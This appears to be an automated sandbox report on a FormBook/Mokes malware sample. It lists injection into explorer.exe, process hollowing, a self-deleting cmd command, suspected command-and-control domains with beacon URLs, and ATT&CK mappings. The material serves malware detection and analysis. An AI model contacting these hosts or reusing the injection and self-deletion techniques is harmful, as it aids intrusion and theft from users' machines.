          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F84257 mov eax, dword ptr fs:[00000030h]6_2_02F84257
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]6_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]6_2_02F1A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F34A2C mov eax, dword ptr fs:[00000030h]6_2_02F34A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F34A2C mov eax, dword ptr fs:[00000030h]6_2_02F34A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F13A1C mov eax, dword ptr fs:[00000030h]6_2_02F13A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBAA16 mov eax, dword ptr fs:[00000030h]6_2_02FBAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBAA16 mov eax, dword ptr fs:[00000030h]6_2_02FBAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFAA16 mov eax, dword ptr fs:[00000030h]6_2_02EFAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFAA16 mov eax, dword ptr fs:[00000030h]6_2_02EFAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F08A0A mov eax, dword ptr fs:[00000030h]6_2_02F08A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]6_2_02EF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov ecx, dword ptr fs:[00000030h]6_2_02EF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]6_2_02EF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]6_2_02EF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]6_2_02F203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]6_2_02F1DBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]6_2_02FA23E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]6_2_02FA23E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov eax, dword ptr fs:[00000030h]6_2_02FA23E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F253C5 mov eax, dword ptr fs:[00000030h]6_2_02F253C5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F753CA mov eax, dword ptr fs:[00000030h]6_2_02F753CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F753CA mov eax, dword ptr fs:[00000030h]6_2_02F753CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC5BA5 mov eax, dword ptr fs:[00000030h]6_2_02FC5BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]6_2_02F24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]6_2_02F24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]6_2_02F24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2B390 mov eax, dword ptr fs:[00000030h]6_2_02F2B390
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22397 mov eax, dword ptr fs:[00000030h]6_2_02F22397
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A mov eax, dword ptr fs:[00000030h]6_2_02F1EB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A mov eax, dword ptr fs:[00000030h]6_2_02F1EB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB138A mov eax, dword ptr fs:[00000030h]6_2_02FB138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]6_2_02F2138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]6_2_02F2138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]6_2_02F2138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAD380 mov ecx, dword ptr fs:[00000030h]6_2_02FAD380
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F01B8F mov eax, dword ptr fs:[00000030h]6_2_02F01B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F01B8F mov eax, dword ptr fs:[00000030h]6_2_02F01B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F23B7A mov eax, dword ptr fs:[00000030h]6_2_02F23B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F23B7A mov eax, dword ptr fs:[00000030h]6_2_02F23B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFDB60 mov ecx, dword ptr fs:[00000030h]6_2_02EFDB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC8B58 mov eax, dword ptr fs:[00000030h]6_2_02FC8B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFDB40 mov eax, dword ptr fs:[00000030h]6_2_02EFDB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFF358 mov eax, dword ptr fs:[00000030h]6_2_02EFF358
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB131B mov eax, dword ptr fs:[00000030h]6_2_02FB131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]6_2_02F1A309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 173.234.255.253 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.starflexacademy.com
          Source: C:\Windows\explorer.exeDomain query: www.dndemystified.com
          Source: C:\Windows\explorer.exeDomain query: www.meganfantastic.com
          Source: C:\Windows\explorer.exeDomain query: www.candydulce.com
          Source: C:\Windows\explorer.exeDomain query: www.ezonkorea.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.143.65.214 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.169.197 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.34.12.41 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.193.20 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.57.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.take-me-bergen.com
          Source: C:\Windows\explorer.exeDomain query: www.insurancedowntown.com
          Source: C:\Windows\explorer.exeDomain query: www.obi4ex.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.206.33 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ladorreguita.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Users\user\Desktop\KY4cmAI0jU.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: B80000Jump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433078 Sample: KY4cmAI0jU.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 31 www.sciencebasedmasks.com 2->31 33 www.baliholisticacademy.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 KY4cmAI0jU.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 KY4cmAI0jU.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.meganfantastic.com 45.195.169.197, 49750, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->35 37 www.ladorreguita.com 173.234.255.253, 49737, 80 LEASEWEB-USA-LAX-11US United States 18->37 39 11 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 help.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          KY4cmAI0jU.exe35%VirustotalBrowse
          KY4cmAI0jU.exe23%MetadefenderBrowse
          KY4cmAI0jU.exe41%ReversingLabsWin32.Backdoor.Mokes
          KY4cmAI0jU.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.help.exe.3407960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.KY4cmAI0jU.exe.2170000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.1.KY4cmAI0jU.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.KY4cmAI0jU.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.help.exe.9fd7e8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.0.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          www.rentcafecloudflaremvccn.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.dndemystified.com/sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.meganfantastic.com/sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.insurancedowntown.com/sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.ladorreguita.com/sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          www.alberthospice.com/sh2m/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.candydulce.com/sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ezonkorea.com/sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		3.143.65.214
          		truefalse
            		high
            www.baliholisticacademy.com
            		192.185.0.218
            		truefalse
              		unknown
              www.take-me-bergen.com
              		172.67.206.33
              		truetrue
                		unknown
                www.meganfantastic.com
                		45.195.169.197
                		truetrue
                  		unknown
                  www.rentcafecloudflaremvccn.com
                  		104.18.193.20
                  		truetrueunknown
                  www.candydulce.com
                  		104.21.89.72
                  		truetrue
                    		unknown
                    www.ezonkorea.com
                    		3.34.12.41
                    		truetrue
                      		unknown
                      www.ladorreguita.com
                      		173.234.255.253
                      		truetrue
                        		unknown
                        dndemystified.com
                        		107.180.57.111
                        		truetrue
                          		unknown
                          www.starflexacademy.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.dndemystified.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.insurancedowntown.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.obi4ex.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.sciencebasedmasks.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.dndemystified.com/sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.meganfantastic.com/sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.insurancedowntown.com/sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ladorreguita.com/sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    www.alberthospice.com/sh2m/true
